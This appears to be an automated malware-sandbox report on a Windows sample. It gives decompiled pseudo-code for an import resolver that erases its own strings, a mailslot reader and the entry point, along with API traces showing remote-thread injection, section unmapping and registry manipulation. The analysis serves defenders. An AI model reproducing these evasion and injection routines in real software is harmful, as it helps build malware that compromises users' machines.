  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
